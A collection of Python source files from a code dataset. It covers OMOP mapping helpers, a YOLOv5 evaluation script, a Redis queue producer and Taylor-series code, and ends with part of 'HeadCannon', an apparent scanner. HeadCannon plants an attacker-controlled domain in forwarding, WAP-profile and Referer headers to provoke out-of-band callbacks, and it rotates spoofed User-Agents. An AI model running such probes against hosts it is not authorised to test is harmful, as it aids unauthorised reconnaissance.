        if (not concept_pair):
            logger.error("migrate_functions.not_null_number() I think your arguments list for a mapping \
isn't complete. It needs -1, 0, and 1. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
                value, arguments, mapping)
            return None
        else:
            try:
                val = _lookup_concept_id(concept_pair[0], concept_pair[1], con)
                return val
            except Exception as e:
                logger.error("can't get concept for %s, %s", concept_pair[0], concept_pair[1])
                logger.error("exception:%s", e)
                raise e
    else:
        logger.error("migrate_functions.map_string() I think your arguments list for a mapping \
isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
            value, arguments, mapping)
        raise Exception("migrate_functions.map_string() I think your arguments list for a mapping \
isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".\
            format( val=value, arg=arguments, mapping=mapping))
def not_null(value, mapping, arguments, con):
    """
    This function cares not about the type of the value, just if it is NA/None/Null or not.
    It returns the "No" concept when the value is null and the "Yes" concept
    otherwise. It requires no arguments.
    Param value - the value to map to True or False concepts
    Param mapping is the row from study_to_ohdsi_mapping (unused)
    Param arguments - none expected/used
    Param con, a psycopg2 database connnection (unused)
    returns concept id for true or false
    """
    return NO_CONCEPT_ID if value is None else YES_CONCEPT_ID
def map_number(value, mapping, arguments, con):
    """
    Map the passed in value from a matching argument.mapped_Number to the concept
    specified by argument.vocabulary_id, argument.concept_code, and return the corresponding Concept object.
    Param value is the value to map to a concept
    Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
    Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
    Param con, a psycopg2 database connnection
    returns concept_id of vocabulary_id, concept_code of mapped value
    """
    concept_pair = None
    logger.info("migrate_functions.map_number value:%s mapping:%s", value, mapping)
    if (arguments and len(arguments) > 0):
        if value is None:
            return None
        for arg in arguments:
            if (arg) :
                #try:
                #except Exception as e:
                #    logger.error("non integer value or mapped_number. None Returned. \"%s\", \"%s\" %s %s",
                #        value, arg['mapped_number'], mapping, arguments)
                #    return None
                int_value = None
                try:
                    int_value = int(value)
                except Exception as e:
                    # value not parseable as int: int_value stays None
                    pass
                try:
                    arg_value = int(arg['mapped_number'])
                except Exception as e:
                    logger.error("non integer value or mapped_number. Check configuration. None Returned. \"%s\", \"%s\" %s %s",
                        value, arg['mapped_number'], mapping, arguments)
                    return None
                # If several rows match, the last one wins.
                if int_value == arg_value:
                    concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
            else:
                logger.error("no null arg for migrate_functions.map_number(). Check Configuratin. mapping: %s, value: %s", mapping, value)
        if (not concept_pair):
            logger.error("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
                value, arguments, mapping)
            return None
        else:
            try:
                return _lookup_concept_id(concept_pair[0], concept_pair[1], con)
            except Exception as e:
                logger.error("can't get concept for %s, %s", concept_pair[0], concept_pair[1])
                logger.error("exception:%s", e)
                raise e
    else:
        logger.error("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
            value, arguments, mapping)
        raise Exception("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".format( val=value, arg=arguments, mapping=mapping))
def map_concept(value, mapping, arguments, con):
    """
    Map a study concept value to an OMOP concept using study_mapping_arguments.

    Param value, the study concept value to map
    Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
    Param arguments, rows (in dict form) from study_mapping_arguments that match concepts to concepts
    Param con, a psycopg2 database connnection
    returns concept_id of mapped vocabulary_id, concept_code pair, or None
    raises Exception when no mapping arguments are configured

    Fixes vs. original: the debug print referenced undefined names
    (arg_value/int_value) which raised NameError on every call with
    arguments; arg is a dict row, so it must be subscripted rather than
    accessed as an attribute; and _lookup_concept_id was called without its
    required con argument.
    """
    concept_pair = None
    logger.info("migrate_functions.map_concept value:%s mapping:%s", value, mapping)
    if (arguments and len(arguments) > 0):
        if value is None:
            return None
        for arg in arguments:
            logger.info("...%s", arg)
            # If several rows match, the last one wins (same as map_string).
            if value == arg['mapped_concept']:
                concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
        if (not concept_pair):
            logger.error("migrate_functions.map_concept() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
                value, arguments, mapping)
            return None
        else:
            return _lookup_concept_id(concept_pair[0], concept_pair[1], con)
    else:
        logger.error("migrate_functions.map_concept() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
            value, arguments, mapping)
        raise Exception("migrate_functions.map_concept() I think your arguments list for a mapping isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".format( val=value, arg=arguments, mapping=mapping))
def linear_equation(value, mapping, arguments, con):
    """
    Alias for transform(): apply value * factor + shift.

    Param string_value
    Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
    Param arguments, rows supplying transform_factor and transform_shift
    Param con, a psycopg2 database connnection
    returns float value
    """
    return transform(value, mapping, arguments, con)
def transform(value, mapping, arguments, con):
    """
    Apply the linear transform value * factor + shift from the first
    argument row.

    Param value, the numeric study value (None passes through as None)
    Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
    Param arguments, rows supplying transform_factor and transform_shift
    Param con, a psycopg2 database connnection

    Be cognizant of the shift happening AFTER the factoring; do your algebra
    and get it right.
    Ex. f = 9/5 * c + 32
        c = 5/9*(f-32)       # not here, rather
        c = 5/9*f - 5/9*32   # so your shift value is not 32, rather 5/9*32.
    """
    if value is None:
        return None
    factor = float(arguments[0]['transform_factor'])
    shift = float(arguments[0]['transform_shift'])
    retval = value * factor + shift
    logger.info("LINEAR EQUATION %s * %s + %s :%s",
                str(value), str(arguments[0]['transform_factor']),
                str(arguments[0]['transform_shift']), str(retval))
    return retval
| 38.730942 | 230 | 0.644031 |
e51a5ed054503cf08f687903b754c4ee5c8d59c8 | 18,399 | py | Python | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | """Test a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/test.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
@torch.no_grad()
def run(data,
        weights=None,  # model.pt path(s)
        batch_size=32,  # batch size
        imgsz=640,  # inference size (pixels)
        conf_thres=0.001,  # confidence threshold
        iou_thres=0.6,  # NMS IoU threshold
        task='val',  # train, val, test, speed or study
        device='',  # cuda device, i.e. 0 or 0,1,2,3 or cpu
        single_cls=False,  # treat as single-class dataset
        augment=False,  # augmented inference
        verbose=False,  # verbose output
        save_txt=False,  # save results to *.txt
        save_hybrid=False,  # save label+prediction hybrid results to *.txt
        save_conf=False,  # save confidences in --save-txt labels
        save_json=False,  # save a cocoapi-compatible JSON results file
        project='runs/test',  # save to project/name
        name='exp',  # save to project/name
        exist_ok=False,  # existing project/name ok, do not increment
        half=True,  # use FP16 half-precision inference
        model=None,
        dataloader=None,
        save_dir=Path(''),
        plots=True,
        wandb_logger=None,
        compute_loss=None,
        ):
    """Evaluate a YOLOv5 model on a detection dataset and report P/R/mAP.

    Called either directly (loads the model and builds a dataloader itself)
    or from train.py during training (model is not None, in which case the
    passed-in model/dataloader/save_dir are reused).
    Returns ((mp, mr, map50, map, *val_losses), per-class mAP array, timing
    tuple of (pre-process, inference, NMS) milliseconds per image).
    """
    # Initialize/load model and set device
    training = model is not None
    if training:  # called by train.py
        device = next(model.parameters()).device  # get model device

    else:  # called directly
        device = select_device(device, batch_size=batch_size)

        # Directories
        save_dir = increment_path(Path(project) / name, exist_ok=exist_ok)  # increment run
        (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True)  # make dir

        # Load model
        model = attempt_load(weights, map_location=device)  # load FP32 model
        gs = max(int(model.stride.max()), 32)  # grid size (max stride)
        imgsz = check_img_size(imgsz, s=gs)  # check image size

        # Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
        # if device.type != 'cpu' and torch.cuda.device_count() > 1:
        #     model = nn.DataParallel(model)

        # Data
        with open(data) as f:
            data = yaml.safe_load(f)
        check_dataset(data)  # check

    # Half
    half &= device.type != 'cpu'  # half precision only supported on CUDA
    if half:
        model.half()

    # Configure
    model.eval()
    is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt')  # COCO dataset
    nc = 1 if single_cls else int(data['nc'])  # number of classes
    iouv = torch.linspace(0.5, 0.95, 10).to(device)  # iou vector for mAP@0.5:0.95
    niou = iouv.numel()

    # Logging
    log_imgs = 0
    if wandb_logger and wandb_logger.wandb:
        log_imgs = min(wandb_logger.log_imgs, 100)
    # Dataloader
    if not training:
        if device.type != 'cpu':
            model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters())))  # run once (warmup)
        task = task if task in ('train', 'val', 'test') else 'val'  # path to train/val/test images
        dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
                                       prefix=colorstr(f'{task}: '))[0]

    seen = 0
    confusion_matrix = ConfusionMatrix(nc=nc)
    names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
    coco91class = coco80_to_coco91_class()
    s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
    p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
    loss = torch.zeros(3, device=device)
    jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
    for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
        t_ = time_synchronized()
        img = img.to(device, non_blocking=True)
        img = img.half() if half else img.float()  # uint8 to fp16/32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0
        targets = targets.to(device)
        nb, _, height, width = img.shape  # batch size, channels, height, width
        t = time_synchronized()
        t0 += t - t_  # accumulate pre-process time

        # Run model
        out, train_out = model(img, augment=augment)  # inference and training outputs
        t1 += time_synchronized() - t  # accumulate inference time

        # Compute loss
        if compute_loss:
            loss += compute_loss([x.float() for x in train_out], targets)[1][:3]  # box, obj, cls

        # Run NMS
        targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device)  # to pixels
        lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else []  # for autolabelling
        t = time_synchronized()
        out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
        t2 += time_synchronized() - t  # accumulate NMS time

        # Statistics per image
        for si, pred in enumerate(out):
            labels = targets[targets[:, 0] == si, 1:]
            nl = len(labels)
            tcls = labels[:, 0].tolist() if nl else []  # target class
            path = Path(paths[si])
            seen += 1

            if len(pred) == 0:
                if nl:
                    stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
                continue

            # Predictions
            if single_cls:
                pred[:, 5] = 0
            predn = pred.clone()
            scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1])  # native-space pred

            # Append to text file
            if save_txt:
                gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]]  # normalization gain whwh
                for *xyxy, conf, cls in predn.tolist():
                    xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()  # normalized xywh
                    line = (cls, *xywh, conf) if save_conf else (cls, *xywh)  # label format
                    with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
                        f.write(('%g ' * len(line)).rstrip() % line + '\n')

            # W&B logging - Media Panel plots
            if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0:  # Check for test operation
                if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
                    box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
                                 "class_id": int(cls),
                                 "box_caption": "%s %.3f" % (names[cls], conf),
                                 "scores": {"class_score": conf},
                                 "domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
                    boxes = {"predictions": {"box_data": box_data, "class_labels": names}}  # inference-space
                    wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
            wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None

            # Append to pycocotools JSON dictionary
            if save_json:
                # [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
                image_id = int(path.stem) if path.stem.isnumeric() else path.stem
                box = xyxy2xywh(predn[:, :4])  # xywh
                box[:, :2] -= box[:, 2:] / 2  # xy center to top-left corner
                for p, b in zip(pred.tolist(), box.tolist()):
                    jdict.append({'image_id': image_id,
                                  'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
                                  'bbox': [round(x, 3) for x in b],
                                  'score': round(p[4], 5)})

            # Assign all predictions as incorrect
            correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
            if nl:
                detected = []  # target indices
                tcls_tensor = labels[:, 0]

                # target boxes
                tbox = xywh2xyxy(labels[:, 1:5])
                scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1])  # native-space labels
                if plots:
                    confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))

                # Per target class
                for cls in torch.unique(tcls_tensor):
                    ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1)  # target indices
                    pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1)  # prediction indices

                    # Search for detections
                    if pi.shape[0]:
                        # Prediction to target ious
                        ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1)  # best ious, indices

                        # Append detections
                        detected_set = set()
                        for j in (ious > iouv[0]).nonzero(as_tuple=False):
                            d = ti[i[j]]  # detected target
                            if d.item() not in detected_set:
                                detected_set.add(d.item())
                                detected.append(d)
                                correct[pi[j]] = ious[j] > iouv  # iou_thres is 1xn
                                if len(detected) == nl:  # all targets already located in image
                                    break

            # Append statistics (correct, conf, pcls, tcls)
            stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))

        # Plot images
        if plots and batch_i < 3:
            f = save_dir / f'test_batch{batch_i}_labels.jpg'  # labels
            Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
            f = save_dir / f'test_batch{batch_i}_pred.jpg'  # predictions
            Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()

    # Compute statistics
    stats = [np.concatenate(x, 0) for x in zip(*stats)]  # to numpy
    if len(stats) and stats[0].any():
        p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
        ap50, ap = ap[:, 0], ap.mean(1)  # AP@0.5, AP@0.5:0.95
        mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
        nt = np.bincount(stats[3].astype(np.int64), minlength=nc)  # number of targets per class
    else:
        nt = torch.zeros(1)

    # Print results
    pf = '%20s' + '%11i' * 2 + '%11.3g' * 4  # print format
    print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))

    # Print results per class
    if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
        for i, c in enumerate(ap_class):
            print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))

    # Print speeds
    t = tuple(x / seen * 1E3 for x in (t0, t1, t2))  # speeds per image
    if not training:
        shape = (batch_size, 3, imgsz, imgsz)
        print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)

    # Plots
    if plots:
        confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
        if wandb_logger and wandb_logger.wandb:
            val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
            wandb_logger.log({"Validation": val_batches})
    if wandb_images:
        wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})

    # Save JSON
    if save_json and len(jdict):
        w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else ''  # weights
        anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json')  # annotations json
        pred_json = str(save_dir / f"{w}_predictions.json")  # predictions json
        print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
        with open(pred_json, 'w') as f:
            json.dump(jdict, f)

        try:  # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
            check_requirements(['pycocotools'])
            from pycocotools.coco import COCO
            from pycocotools.cocoeval import COCOeval

            anno = COCO(anno_json)  # init annotations api
            pred = anno.loadRes(pred_json)  # init predictions api
            eval = COCOeval(anno, pred, 'bbox')
            if is_coco:
                eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files]  # image IDs to evaluate
            eval.evaluate()
            eval.accumulate()
            eval.summarize()
            map, map50 = eval.stats[:2]  # update results (mAP@0.5:0.95, mAP@0.5)
        except Exception as e:
            print(f'pycocotools unable to run: {e}')

    # Return results
    model.float()  # for training
    if not training:
        s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
        print(f"Results saved to {save_dir}{s}")
    maps = np.zeros(nc) + map
    for i, c in enumerate(ap_class):
        maps[c] = ap[i]
    return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
    """Define and parse the command-line options for test.py."""
    parser = argparse.ArgumentParser(prog='test.py')
    add = parser.add_argument  # local alias keeps the option table compact
    add('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
    add('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    add('--batch-size', type=int, default=32, help='batch size')
    add('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
    add('--conf-thres', type=float, default=0.001, help='confidence threshold')
    add('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
    add('--task', default='val', help='train, val, test, speed or study')
    add('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    add('--single-cls', action='store_true', help='treat as single-class dataset')
    add('--augment', action='store_true', help='augmented inference')
    add('--verbose', action='store_true', help='report mAP by class')
    add('--save-txt', action='store_true', help='save results to *.txt')
    add('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
    add('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    add('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
    add('--project', default='runs/test', help='save to project/name')
    add('--name', default='exp', help='save to project/name')
    add('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    add('--half', action='store_true', help='use FP16 half-precision inference')
    opt = parser.parse_args()
    # Interdependent options: COCO runs always save JSON, hybrid implies txt.
    opt.save_json = opt.save_json or opt.data.endswith('coco.yaml')
    opt.save_txt = opt.save_txt or opt.save_hybrid
    opt.data = check_file(opt.data)  # check file
    return opt
def main(opt):
    """Entry point: dispatch to a normal run, a speed benchmark, or a study sweep."""
    set_logging()
    # Echo every option so a run is reproducible from the log alone.
    print(colorstr('test: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
    check_requirements(exclude=('tensorboard', 'thop'))
    if opt.task in ('train', 'val', 'test'): # run normally
        run(**vars(opt))
    elif opt.task == 'speed': # speed benchmarks
        # Fixed fast thresholds; JSON/plots disabled so only timing matters.
        for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
            run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
                save_json=False, plots=False)
    elif opt.task == 'study': # run over a range of settings and save/plot
        # python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
        x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
        for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
            f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
            y = [] # y axis
            for i in x: # img-size
                print(f'\nRunning {f} point {i}...')
                # r = metrics tuple, t = per-image timing tuple; concatenated per row.
                r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
                              iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
                y.append(r + t) # results and times
            np.savetxt(f, y, fmt='%10.4g') # save
        os.system('zip -r study.zip study_*.txt')
        plot_study_txt(x=x) # plot
if __name__ == "__main__":
    opt = parse_opt()
    main(opt)
| 50.133515 | 121 | 0.575357 |
0807e6801a24116b10f78baf12d2fe6616b27c12 | 285 | py | Python | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | import redis
import random
from time import sleep
# Producer half of a simple Redis work queue: endlessly push a random
# chocolate variety onto the 'czekolady' (Polish: "chocolates") list.
conn = redis.Redis()
# Variety names are Polish: milk, dark, caramel, nut.
varieties = ['mleczna', 'gorzka', 'karmelowa', 'orzechowa']
conveyor = 'czekolady'
while True:
    # Random 0-1 s pause to mimic an irregular production rate.
    seconds = random.random()
    sleep(seconds)
    piece = random.choice(varieties)
    conn.rpush(conveyor, piece)  # append to the right end of the queue
| 21.923077 | 59 | 0.705263 |
ea289e499c14f108b483267c19c5836fe6bcf8f2 | 357 | py | Python | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | null | null | null | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | 3 | 2020-09-25T14:34:26.000Z | 2020-10-17T16:36:25.000Z | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | null | null | null | import math
def taylor_series1(x, degree):
    """Approximate e**x with the Taylor series truncated after `degree`+1 terms."""
    return sum(x ** k / math.factorial(k) for k in range(degree + 1))
def taylor_series2(x, degree):
    """Approximate e**x as 1 / e**(-x), summing the series for the negated argument.

    For negative x this avoids the cancellation of an alternating series.
    """
    flipped = -x  # remove negative sign
    denominator = sum(flipped ** k / math.factorial(k) for k in range(degree + 1))
    return 1 / denominator
da805ca3f1a7d360510b88e6cf027978843f3625 | 6,977 | py | Python | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | 1 | 2019-08-24T13:05:12.000Z | 2019-08-24T13:05:12.000Z | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | null | null | null | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import sys
import uuid
import time
import asyncio
import argparse
import requests
from random import choice
from colorama import Fore, Style, init
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from concurrent.futures import ThreadPoolExecutor
# ASCII banner; the six {} slots are filled with colorama color codes by main().
banner = """
{}:{}:{} H E A D C A N N O N {}:{}:{}
"""
# Timestamp in the locale's date/time format, used by all log helpers below.
def timestamp(): return time.strftime('%x %X')
# Colored one-line loggers: blue [+] info, yellow [!] warning, red [!] error.
def info(string): print('{}{}[+]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.BLUE, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
def warn(string): print('{}{}[!]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.YELLOW, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
def error(string): print('{}{}[!]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.RED, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
# Right-aligned "key : value" line for the pre-run configuration summary.
def stats(key, value): print('{:>16}{} : {}{}{}{}'.format(key, Style.DIM, Style.BRIGHT, Fore.CYAN, value, Style.RESET_ALL))
# Browser User-Agent strings; one is picked at random per request in test_url().
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
               'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
               'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
               'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
               'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
               'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
               'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
               'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
               'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
               'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
def test_url(session, host, referer):
    """GET http(s)://host with headers that embed host into subdomains of `referer`.

    Each header value combines the target host and the attacker domain
    (e.g. '<host>.forwardfor.<referer>') - presumably so that any backend
    resolving/fetching these values produces an attributable out-of-band
    callback; confirm against the tool's intended workflow.
    Returns True when a response was received (any status), False on error.
    Reads module globals `args` and `proxies` set in the __main__ block.
    """
    if args.ssl:
        protocol = 'https://'
    else:
        protocol = 'http://'
    # build the headers with uuid for tracking
    forwarded_for = host + '.forwardfor.' + referer
    true_client_ip = host + '.trueclient.' + referer
    wap_profile = protocol + host + '.wap.' + referer + '/wap.xml'
    referer = protocol + host + '.referer.' + referer
    user_agent = choice(user_agents)
    headers = {'X-Forwarded-For' : forwarded_for,
               'True-Client-IP' : true_client_ip,
               'X-WAP-Profile' : wap_profile,
               'Referer' : referer,
               'User-Agent': user_agent,
               'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}
    info('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.BLUE, 'GET', Style.RESET_ALL, host))
    # send the request, check the status
    try:
        response = session.get(protocol+host,
                               headers=headers,
                               timeout=args.timeout,
                               proxies=proxies,
                               verify=False)  # certificate errors are ignored on purpose
        if response.status_code != 200:
            # Non-200 is only reported, not treated as failure.
            if args.verbose:
                warn('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.YELLOW, response.status_code, Style.RESET_ALL, host))
        return True
    except Exception as e:
        # Connection/timeout/SSL problems are collapsed into a single ERR line.
        if args.verbose:
            error('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.RED, 'ERR', Style.RESET_ALL, host))
        return False
async def run_ansync():
    """Fan test_url() out over all targets via a thread pool driven from asyncio.

    Targets come either from the --list file (one per line) or the single
    --domain argument; a shared requests.Session with retry-mounted adapters
    is reused across all workers.
    """
    if args.list:
        with open(args.list, 'r') as f:
            target_list = [t.strip() for t in f.readlines()]
    else:
        target_list = [args.domain]
    # show the config
    stats('workers', args.workers)
    stats('targets', len(target_list))
    print('')
    with ThreadPoolExecutor(max_workers=args.workers) as executor:
        with requests.Session() as session:
            # configure the retries
            retry = Retry(
                total=args.retries,
                backoff_factor=0.3,
                status_forcelist=(500, 502, 504),
            )
            adapter = HTTPAdapter(max_retries=retry, pool_connections=50, pool_maxsize=50)
            session.mount('http://', adapter)
            session.mount('https://', adapter)
            # configure the connection
            session.keep_alive = False
            # in case SSL fails
            session.verify = False
            requests.packages.urllib3.disable_warnings()
            # run in executor loop: one thread-pool task per target
            loop = asyncio.get_event_loop()
            tasks = [
                loop.run_in_executor(
                    executor,
                    test_url,
                    *(session, target, args.attacker)
                )
                for target in target_list
            ]
            # Results are ignored; gather() is only used to await completion.
            for response in await asyncio.gather(*tasks):
                pass
def main():
    """Initialise colour output, show the banner, and drive the async scan."""
    # cross platform colorama
